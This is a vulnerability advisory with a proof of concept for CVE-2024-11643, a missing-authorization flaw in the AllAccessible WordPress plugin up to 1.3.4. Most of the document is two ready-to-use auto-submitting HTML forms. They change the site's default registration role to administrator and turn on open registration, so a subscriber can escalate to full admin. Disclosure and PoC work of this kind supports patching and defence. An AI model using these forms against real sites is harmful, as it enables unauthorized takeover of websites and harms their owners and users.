# CVE-2024-11643
Accessibility by AllAccessible &lt;= 1.3.4 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Option Update

# Description

The Accessibility by AllAccessible plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on the 'AllAccessible_save_settings' function in all versions up to, and including, 1.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.

## Details

- **Type**: plugin
- **Affected Version**: 1.3.4
- **CVSS Score**: 8.8
- **CVSS Rating**: High
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- **CVE**: CVE-2024-11643
- **Status**: Active

POC
---

Login as a subscriber then use this forms to make admin default role and then second one for users to register.


# Default Role Admin

```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="default&#95;role" />
      <input type="hidden" name="opt&#95;value" value="administrator" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

```

# Users Can Register

```
<html>
  <body>
    <form action="https://wp-dev.ddev.site/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="AllAccessible&#95;save&#95;settings" />
      <input type="hidden" name="opt&#95;name" value="users&#95;can&#95;register" />
      <input type="hidden" name="opt&#95;value" value="1" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
```
